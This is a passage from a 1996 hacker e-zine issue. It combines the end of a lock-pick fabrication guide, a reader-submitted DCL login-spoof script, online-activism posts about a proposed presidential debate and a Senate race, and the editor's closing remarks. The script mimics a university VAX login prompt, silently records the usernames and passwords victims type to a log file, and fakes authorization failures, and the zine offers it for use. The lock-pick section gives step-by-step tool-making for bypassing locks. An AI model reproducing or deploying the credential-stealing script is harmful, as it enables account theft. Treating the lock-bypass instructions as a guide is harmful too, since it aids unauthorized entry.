To make the 80 degree head bend, lift the bristle out of the vise by about 1/4 inch (so 3/4 inch is still in the vise). Place the shank of a screwdriver against the bristle and bend the spring steel around it about 90 degrees. This should set a permanent 80 degree bend in the metal. Try to keep the axis of the bend perpendicular to the handle. The screwdriver shank ensures that the radius of curvature will not be too small. Any rounded object will work (e.g. a drill bit, needle nose pliers, or a pen cap). If you have trouble with this method, try grasping the bristle with two pliers separated by about 1/2 inch and bend. This method produces a gentle curve that won't break the bristle.

A grinding wheel will greatly speed the job of making a pick. It takes a bit of practice to learn how to make smooth cuts with a grinding wheel, but it takes less time to practice and make two or three picks than it does to hand file a single pick. The first step is to cut the front angle of the pick. Use the front of the wheel to do this. Hold the bristle at 45 degrees to the wheel and move the bristle side to side as you grind away the metal. Grind slowly to avoid overheating the metal, which makes it brittle. If the metal changes color (to dark blue), you have overheated it, and you should grind away the colored portion. Next, cut the back angle of the tip using the corner of the wheel. Usually one corner is sharper than the other, and you should use that one.
Hold the pick at the desired angle and slowly push it into the corner of the wheel. The side of the stone should cut the back angle. Be sure that the tip of the pick is supported. If the grinding wheel stage is not close enough to the wheel to support the tip, use needle nose pliers to hold the tip. The cut should pass through about 2/3 of the width of the bristle. If the tip came out well, continue. Otherwise break it off and try again. You can break the bristle by clamping it into a vise and bending it sharply.

The corner of the wheel is also used to grind the tang of the pick. Put a scratch mark to indicate how far back the tang should go. The tang should be long enough to allow the tip to pass over the back pin of a seven pin lock. Cut the tang by making several smooth passes over the corner. Each pass starts at the tip and moves to the scratch mark. Try to remove less than 1/16th of an inch of metal with each pass. I use two fingers to hold the bristle on the stage at the proper angle while my other hand pushes the handle of the pick to move the tang along the corner. Use whatever technique works best for you.

Use a hand file to finish the pick. It should feel smooth if you run a fingernail over it. Any roughness will add noise to the feedback you want to get from the lock.

The outer sheath of phone cable can be used as a handle for the pick. Remove three or four of the wires from a length of cable and push it over the pick. If the sheath won't stay in place, you can put some epoxy on the handle before pushing the sheath over it.

A.3 Bicycle Spokes

An alternative to making tools out of street cleaner bristles is to make them out of nails and bicycle spokes. These materials are easily accessible and when they are heat treated, they will be stronger than tools made from the bristles.

A strong torque wrench can be constructed from an 8-penny nail (about .1 inch diameter).
First heat up the point with a propane torch until it glows red, slowly remove it from the flame, and let it air cool; this softens it. The burner of a gas stove can be used instead of a torch. Grind it down into the shape of a skinny screwdriver blade and bend it to about 80 degrees. The bend should be less than a right angle because some lock faces are recessed behind a plate (called an escutcheon) and you want the head of the wrench to be able to reach about half an inch into the plug. Temper (harden) the torque wrench by heating to bright orange and dunking it into ice water. You will wind up with a virtually indestructible bent screwdriver that will last for years under brutal use.

Bicycle spokes make excellent picks. Bend one to the shape you want and file the side of the business end flat such that it's strong in the vertical and flexy in the horizontal direction. Try a right-angle hunk about an inch long for a handle. For smaller picks, which you need for those really tiny keyways, find any large-diameter spring and unbend it. If you're careful you don't have to play any metallurgical games.

A.4 Brick Strap

For perfectly serviceable key blanks that you can't otherwise find at the store, use the metal strap they wrap around bricks for shipping. It's wonderfully handy stuff for just about anything you want to manufacture. To get around side wards in the keyway, you can bend the strap lengthwise by clamping it in a vise and tapping on the protruding part to bend the piece to the required angle.

Brick strap is very hard. It can ruin a grinding wheel or key cutting machine. A hand file is the recommended tool for milling brick strap.

-= END OF FILE =-

* Origin: Combat Arms BBS - Portland, OR - (503) 221-1777 (1:105/68)

* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #5 of 8
Yet Another Login Spoof
Brent Barnhill

From 0211065@ACAD.NWMISSOURI.EDU Wed Jan 24 13:08:04 1996
Date: Mon, 22 Jan 1996 16:52:08 -0600 (CST)
From: "HI...JUST THOUGHT I WOULD DROP BY" <0211065@ACAD.NWMISSOURI.EDU>
To: mrs3691@hertz.njit.edu
Subject: fake login program

Hey there. I heard that you are the person to contact to submit hackers' programs. Well, I just made a wonderful fake login program in DCL. The program is supposed to work if someone lets someone else use my account to telnet to my school and login. Well, here it is:

$ wait 00:00:02
$ set message/id/sev/facil/text
$ W :== Write sys$output
$ TI :== Type sys$input
$ TI
Trying...
Connected to ACAD.NWMISSOURI.EDU.
$ W ""
$ W ""
$ W ""
$ TI
Welcome to Northwest Missouri State University.
Current access is to a VAX Cluster on Node S0.
Missouri statutes prohibit computer tampering.
$ W ""
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ inquire/nopunctuation sel "User authorization failure.[26D"
$ if sel .eqs. "" then goto asdf
$ asdf:
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ inquire/nopunctuation sel "User authorization failure.[26D"
$ if sel .eqs. "" then goto klll
$ klll:
$ read/prompt = "Username: " sys$command username
$ set term/noecho
$ read/prompt = "Password: " sys$command password
$ set term/echo
$ open/write log d3:[211065]log.txt
$ write log username, " "
$ write log password, " "
$ close log
$ TI
User authorization failure
$ W ""
$ TI
Connection closed by Foreign Host
$ bye

Here is my wonderful info:

Brent Barnhill or "Hey"
(816) 562-6237
314 Dieterich
http://www.nwmissouri.edu/~0211065

PLEASE FINGER ME SINCE I HAVE "TONS" OF FREE COOL STUFF!!!

Have a wonderful day!

Brent :)

* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #6, File #6 of 8

A Request for Action
Jim Warren

[I'm sending this to a journalists listserv and to various personal contacts in the press, as well as to my GovAccess subscribers. It is highly time-sensitive. Please ... accept this as a personal note. Please ... RECIRCULATE it, widely.]

Folks,

There's a time to read and contemplate. There's a time to discuss and debate and haggle -- with peers who have about the equal power as you have over the nation's future. And there's a time to ACT -- to DO SOMETHING! To IMPROVE OUR POTENTIAL FUTURE.

Please ... I urge you ... I implore you -- Act NOW.

It is obvious that we MUST act. We MUST move our nation's "leaders" -- sometimes fearfully kicking and screaming -- into the Information Age. We must demand that those who wish to lead us must drive the "information superhighways" that they are so zealously, piously -- and *ignorantly* -- attempting to police. We MUST make them aware of the net's power as a tool of freedom and democracy -- and effective grassroots action -- before they destroy its potential. For they are endangering us all, through posturing stupidity and self-righteous arrogance.

That we MUST act is obvious from numerous examples.
To name just a few:

* The administrations' (plural) zealous, continuing suppression of standardized personal privacy protection for communications and files -- via globally-published, freely-available robust cryptography; blockading needed privacy for business and citizens -- who are now "presumed innocent" *only* during trial; only *after* being arrested and indicted;

* Last year's half-billion-dollar wiretap law, that forces every telephone company to make our nation wiretap-ready for whichever fascist first chooses to abuse that awesome power;

* This year's successful efforts to make the government into our parent and overseer -- a federal daddy censoring all that we say or see, if we dare to use any "telecommunications device" (and it *doesn't* just censor the net!);

* The just-passed Telecommunications Deform Act -- that grants so much freedom to those giant corporations who paid so much to those who voted ... freedom to create cartels, to price-gouge where they have functional monopolies, to sell our electronic news media to unscrupulous foreigners, and to allow whichever media giant has the most money to buy control of and monopolize the print and broadcast news channels in any geographic area; and

* The legislation by senior Republican Congressman Henry Hyde, just reported in net email, that would allegedly classify all abortion information -- *medical*, social or political -- as "obscene," prohibiting its discussion using any telecomm device, including telephones and the net. (And that's not as draconian as what other senior "leaders" have proposed!)

YOU -- each of us -- CAN help presidential candidates better understand the net:

PRESIDENTIAL CANDIDATES ONLINE DEBATE, NOW!
As one tiny step for those asking to "lead" us into the 21st Century and the Information Age -- to help them understand the net's potential -- I have invited presidential candidates to participate in a week of online debate (requiring only a few minutes daily; from any place; at any time; presumably/hopefully with their staff doing the typing). Each day, the candidates themselves will question each other, followed by their responses and then by rebuttals -- all of limited length, submitted within agreed-upon daily time limits, with pointers to additional online information if they desire.

As the most significant current target of opportunity, I proposed the debate for the Republican primary's presidential candidates. Because the driving force of their competition is likely to end after the Iowa caucuses (2/12) and the New Hampshire primaries (2/20), I proposed that the debates begin next Monday, Feb. 5th, and conclude Feb. 11th.

If we can set the precedent with the Republicans, now, then substantive online presidential debates will be likely prior to next November's general elections. If the primary debate doesn't happen now, it seems likely that major presidential candidates will not debate online until the next century!

MAJOR NATIONAL NEWS MEDIA COOPERATING

The U.S. NEWS & WORLD REPORT, Knight-Ridder's MERCURY CENTER at the SAN JOSE MERCURY NEWS, and New Jersey's second-largest newspaper, the ASBURY PARK PRESS, have all agreed to carry any substantive presidential debate on their public websites, and others are likely. (As a data-point, Mercury Center typically gets 300,000 to 400,000 hits per day, and tops 500,000 on "hot" news days.)

Numerous reporters, columnists and editors with mainstream media have said that they would cover any substantive online debate that included major candidates. Today, Reuters carried a major story about the proposed debate, and others will appear shortly in U.S. NEWS & WORLD REPORT and in the NATIONAL JOURNAL -- among others.
THREE CANDIDATES HAVE ACCEPTED -- BUT FIVE OTHERS REMAIN UNCOMMITTED

Lugar, Taylor and Collins have already sent signed commitments to participate. Another candidate said no; another said yes and signed -- then reneged (below).

The agreement is that the debate will occur only if there are at least four candidates. And, unless at least one more "major" candidate joins the debate, it's doubtful that the press will consider it substantive and worth significant coverage.

The remaining candidates *must decide by NEXT MONDAY*!! Please -- help them:

ASK THOSE WHO WOULD BE OUR PRESIDENT TO PARTICIPATE IN OUR FUTURE -- NOW

The non-committed candidates will participate only if they believe that (1) lots of people [voters] are interested, and (2) the press is likely to cover it. (The press *will* cover it, *if* several of the "major" candidates participate.)

As a voter, please ...

1. Phone, fax and email the candidates, NOW, asking them to participate -- if they want us to believe they are competent to lead us into the Information Age.

2. Email this message to every person you know who lives or works in Iowa or New Hampshire (e.g., *all* the staff at the numerous computer magazines in NH!).

Please - do it NOW! Yes, the campaign managers *are* working day and night and through the weekend.

Let's demonstrate the power of the net -- before arrogance or stupidity demolishes its power and potential.

Thanks for reading.

--jim

Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Member, Freedom-of-Information Committee, Soc. of Prof. Journalists - Nor. Cal.
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>
[puffery: John Dvorak Lifetime Achievement Award (1995); James Madison Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal. (1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994); Pioneer Award, Electronic Frontier Foundation (its first year, 1992); founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).]

Lamar Alexander: 615-327-3350; fax/615-340-0397, Campaign Mgr Dan Pero
    lamar@Nashville.net
    http://www.lamar.com/~lamar/

Phil Gramm: 202-467-8600; fax/202-467-8696, Campaign Mgr Jeb Hensarling
    info@gramm96.org
    http://www.gramm96.com/

Pat Buchanan: 703-848-1996; fax/703-827-0592, Campaign Mgr Terry Jeffries
    lmuller@iquest.com
    http://www.buchanan.org/

Bob Dole: 202-414-6400; fax/202-408-9446, Campaign Mgr Scott Reed
    [apparently no email except via webpage]
    http://www.dole96.org/

Steve Forbes: 908-781-5111 [the best # I've found]; fax/908-781-6001
    forbes@forbes96.com
    http://www.forbes96.com/

Those who have committed to debate:

Dick Lugar: fax/317-931-4106, Mark Lubbers <== WILL debate!
    rgl@iquest.net
    http://www.iquest.com/lugar/

Charles Collins: 912-994-8219; fax/912-994-7995, George Gruner <== WILL debate!
    [may be] http://computek.net/public/collins/collins.html

Morry Taylor: fax/515-264-7510, Campaign Mgr Bill Kenyon <== WILL debate!
    TPresident@aol.com
    http://www.webcom.com/~morry96/

Those who have declined or reneged (might be worth email or a call):

Bob Dornan: fax/703-644-5117, Campaign Mgr Terri Cobban <== "Yes," then "No."
    [I have a staffer's email address, but I believe it's not public]
    [may be] http://www.umr.edu/~sears/primary/dornan.html

Alan Keyes: 503-463-1818; fax/602-263-7790, Nat'l Polit.Dir George Uribe <== NO.
    GeoUribe@aol.com
    http://www.keyes.gocin.com/

Keyes campaign manager sent email saying, "I do like the concept and so does Ambassador Keyes. Unfortunately we can't spare a week for a staffer to service the program." (Yes, we spoke and I explained how online forums operate, and how easily they can be done using minimal and flexible time.)
Dornan campaign manager Terri Cobban verbally agreed to debate, twice -- two days apart -- and they later faxed a written commitment, signed explicitly by "Bob Dornan." But on Wednesday afternoon (1/31), Cobban called and said they were cancelling. When I asked for a signed fax confirming this, she said, "No, I feel a verbal statement is sufficient at this time."

Mo' as it Is.

--jim

Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>

To add or drop GovAccess, email to Majordomo@well.com ('Subject' ignored)
with message: [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message: info GovAccess
Past postings are at ftp.cpsr.org: /cpsr/states/california/govaccess
and by WWW at http://www.cpsr.org/cpsr/states/california/govaccess .
Also forwarded to USENET's comp.org.cpsr.talk by CPSR's Al Whaley.
May be copied & reposted except for any items that explicitly prohibit it.

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #6, File #7 of 8

Cyberspace Makes the Difference

Voter's Telecommunications Watch

FOR IMMEDIATE RELEASE
FEBRUARY 1, 1996

Contact:
Steven Cherry
(201) 596-2851
stc@vtw.org

Shabbir Safdar
(718) 596-2851
shabbir@vtw.org

New York, NY

RON WYDEN WINS SPECIAL OREGON SENATE ELECTION
INTERNET ACTIVIST GROUP CLAIMS SHARE OF SUCCESS

Voter's Telecommunications Watch, an on-line civil liberties group, announced today that the closeness of the vote in Oregon's special Senate election justified the attention given to the cyberspace vote by the Wyden campaign. Wyden's 1% margin of victory represented fewer than 20,000 votes.
Wyden took pains to make his campaign accessible to Internet voters through on-line appearances, an Internet account that answered voter email promptly, by maintaining an active World Wide Web site, and by being the first candidate in the 1996 election season to answer VTW's Technology Pledge. The pledge consists of four questions that probe a candidate's stand on the central cyberliberties issues of the day.

Wyden, currently serving in the House of Representatives, not only answered all four Pledge questions in the affirmative, he was able to point to a Congressional legislative record that supported those answers. VTW and the Oregon on-line community widely circulated the answers of three candidates to the pledge questionnaire, and received testimony from many voters that the relative stands of the candidates on these telecommunications issues determined their vote.

VTW looks forward to Wyden's contributions to telecommunications and civil liberties issues shifting from the House to the Senate. It is also encouraged that by helping to draw attention to the positions of candidates throughout the 1996 elections, citizens involved in the on-line world will make their voices heard in the voting booth.

Voters Telecommunications Watch is a volunteer organization, concentrating on legislation as it relates to telecommunications and civil liberties. VTW publishes a weekly BillWatch that tracks relevant legislation as it progresses through Congress. It publishes periodic Alerts to inform the about immediate action it can take to protect its on-line civil liberties and privacy.

The Wyden campaign can still be contacted on-line or off-line at:

Wyden for Senate
Sue Castner, Press Representative
PO Box 3498, Portland, OR 97208
503-248-9567, fax: 503-248-9890
wyden@teleport.com
http://www.teleport.com/~wyden

More information about VTW can be found on-line at
gopher -p 1/vtw gopher.panix.com
www: http://www.vtw.org
or by writing to vtw@vtw.org.
The press can call (718) 596-2851 or contact:

Shabbir Safdar        Steven Cherry
shabbir@vtw.org       stc@vtw.org

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #6, File #8 of 8

The End

There it goes again. Another issue came and went, and 30 more days must come and go before the next fix of Hackers can be injected into your blood stream. If you need to talk to somebody before then, I should be on the Defcon bridge now and then, and the 2600 voice BBS. As always, I'm at mrs3691@hertz.njit.edu, (201) 565-9145, 621A Redwood Hall, 186 Bleeker St., Newark, NJ, 07103. The official web site is still http://hertz.njit.edu/~mrs3691, and the official ftp site is still infonexus.com.

In your lab, tinkering with the inner flesh of the phone system, toying with the defense networks of foreign countries, are you frustrated because your work is taken for granted by huge corporations who pay well but offer none of that feeling of accomplishment and awe that you desire so much? Then submit an article to Hackers, and receive the recognition you so deserve.

I haven't decided whether the no-prize will be all the parts necessary to build a beige box that aren't included in a normal phone, or a real live visit with an intelligent Bell Atlantic Operator. But you have to submit to win! So hopefully next issue will be chock full of ideas for those of us with way too much consumer electronics lying around, and not enough to do with it.

See you next month, and wherever you hack, may the ethic be with you.

- Revolution